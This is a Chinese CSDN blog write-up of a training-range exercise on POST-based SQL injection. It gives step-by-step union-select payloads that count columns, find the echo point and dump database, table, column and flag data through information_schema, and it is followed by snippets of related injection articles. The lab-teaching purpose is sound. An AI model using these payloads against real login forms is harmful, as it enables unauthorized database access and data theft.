[zkaq靶场]SQL注入--POST注入

最新推荐文章于 2024-08-01 20:47:16 发布
最新推荐文章于 2024-08-01 20:47:16 发布
阅读量479 收藏
点赞数 1
分类专栏: zkaq靶场 文章标签: sql sql注入 数据库注入 POST注入 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116544541
版权
本文详细介绍了SQL注入中的POST注入技术,包括其与GET注入的相似性、闭合方式检测、字段数探测、回显点定位、数据库与表的爆库与爆表操作,以及如何利用group_concat函数获取数据和flag。通过实例展示了如何进行POST注入攻击,揭示了网络安全中这一常见漏洞的危害。
摘要由CSDN通过智能技术生成

SQL注入–POST注入

SQL注入回顾:网络安全笔记-99-渗透-SQL注入

POST注入

POST型注入与GET型注入没有本质区别

POST注入一

输入账号密码,然后抓包


检测出单引号闭合的方式,接下来就可以进行注入.

检测出字段数

  • username=admin’ order by 3–+&password=1&submit=%E7%99%BB%E5%BD%95

检测回显点


![]

爆库

  • username=admin1’ union select 1,2,database()–+&password=1&submit=%E7%99%BB%E5%BD%95

爆表

  • username=admin1’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())–+&password=1&submit=%E7%99%BB%E5%BD%95

爆字段

  • username=admin1’ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘flag’)–+&password=1&submit=%E7%99%BB%E5%BD%95

爆数据

  • username=admin1’ union select 1,2,(select group_concat(flag) from flag)–+&password=1&submit=%E7%99%BB%E5%BD%95

获得flag.

POST注入二

原理相同,只是闭合方式为")

88970)]

获得flag.

POST注入二

原理相同,只是闭合方式为")

wwxxee
关注
专栏目录
[zkaq靶场]SQL注入--布尔盲注
wwxxee
05-08 202
布尔盲注 常用函数 length() 返回字符串长度 substring() substr() mid() 截取字符串: 参数1:字符串 参数2:起始位置,索引从1开始 参数3:截取长度 concat() 不带分隔符链接字符串 concat_ws() 带分隔符链接字符串: concat_ws(’-’,‘a’,‘b’,‘c’) group_concat() 链接一组查询结果字符串 ord() ascii() 返回字符串的ASCII值 left() 从左边开始截取字符串: 参数1:字符串 参数2:截取的长度 l
封神台SQL注入-header注入
qq_40941912的博客
08-25 741
一、原理 数据路径出现符号是会爆错的 全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了 $_POST (获取POST传参) $_GET (获取GET的传参) $_COOKIE (获取COOKIE的值) $_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组) **$_SERVER()**它包含着诸多的信息,有头信息(heander),路径(path),脚本位置
SQL注入
weixin_33696106的博客
12-19 100
一、SQL注入简介   SQL注入SQL Injection),通过构建SQL代码相关的特殊输入,作为参数传递到服务器,服务器解析并执行SQL语句进而达到攻击者所要的操作。如:通过提交一段数据库查询代码,根据程序返回的结果,获得某些攻击者想得知的数据;或通过控制部分SQL语句,攻击者可以利用数据库的一些特性,直接获取数据库服务器的系统权限。   发生SQL注入的主要原因是程序没有细致地过滤用...
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 1938
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中记录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面记录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),记录着与table_schema这个字段对应的数据库中对应的表名。
[zkaq靶场]SQL注入--Header注入
wwxxee
05-08 267
SQL注入–Header注入 Header注入一 登录成功后,浏览器会存储一些信息. 此处经过判断为User-Agent字段. 抓包如下: 使用报错注入:由于updatexml的第二个参数需要xpath 格式的字符串,concat函数用~符号开头不是xml的语法,所以就会将括号内的执行结果以错误的形式报出,这样就实现了报错注入。 对User-Agent字段进行注入. User-Agent: 1' or updatexml(1,(concat(0x7e,(select database()))),1) a
mysql注入靶场,SQL注入靶场Post注入 Rank1-3
weixin_36476970的博客
03-18 176
---------------------------------Rank 1 -------------------------------------------------先在表单Username编辑框中输入1,点登录,页面回显如下:image.png然后在Username中输入1',点登录,再看回显,看是否存在注入:image.png可看到存在注入,且从错误提示信息中可以看到,数据库是My...
Sql注入
qq_46540840的博客
03-11 338
目录引言类型:工具:常用方式数据库一些函数和绕过方式(待补充)函数绕过方式数字字符注入[判断标准][1]第二种方法是使用Sqlmap 这里很是方便Bool 盲注法一 : 用bp 半自动化注入法二: 用py脚本实现注入Sql 注入用法一用法二用法三 引言 Sql注入漏洞是攻击者通过任意构造sql语句对网页数据库进行任意操作(增删改查) 这里讲述sql注入入门基础. 类型: 1. 数字型注入 2. 字符型注入 3. 布尔注入 4. 报错注入 5. Cookie注入 6. 还有一些头部注入 工具:
SQL注入的本质
鱼的博客
07-27 1574
SQL注入的本质 注入攻击的本质: 把用户输入的数据当做代码执行。 两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行 针对SQL语句的注入,也可以理解为用户输入的数据当做SQL语句的代码执行 显错注入-联合查询(Mysql数据库)的基本流程 重要知识点: 通过系统自带库查询数据 通过系统自带库查询数据 Mysql在5.0以上版本加入了information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息
SQL注入大汇总(逐步细化)
qq_43756450的博客
08-11 712
SQL注入总结基本流程思路一、判断注入点二、判断字段数三、判断回显点四、查询相关内容注入类型及构造语句一、显错注入二、布尔盲注三、HEAD注入四、POST注入五、宽字节注入六、延时注入脚本编写思路 基本流程思路 一、判断注入点 id = 1 加特殊符号与前边符号闭合,尾部加 --+ 或 # 注释掉后面的特殊符号,页面出错 这是参数为字符型才需要引号闭合,如果人家本来就是数字就不用加引号了 单引号:id = 1’ 双引号:id = 1" 以上两种还多一个小括号:id = 1’) 或 id = 1") 如果
宽字节注入靶场练习
weixin_60777183的博客
08-30 392
课堂知识点: 当有魔术引号无法闭合时,绕过方法: 1.找不需要闭合的地方(即没有单双引号等闭合的地方) 2.仔细查看作用域(魔术引号只对get post cookie传参有效) 3.宽字节法。(当我们在\前传了一个字符,用gbk编码可以跟\组成一个字,\就逃 逸了出来) ps:国际编码:utf-8 汉字编码:gbk 采用宽字节绕过的办法: url编码中,一个英文单引号’用url编码表示是 %27 url编码中,一个反斜杠\用url编码表示是 %5c %df\可以凑成汉字 %9c\ %dd\等也可以
三种数据库SQL 注入详解
热门推荐
YT的博客
02-25 11万+
SQL 注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL 注入分类 1. 数字型注入 当输入的参数为整型时,则有可能存在数字型注入漏洞。 假设存在一条 URL 为:HTTP://www.aaa.com/test...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值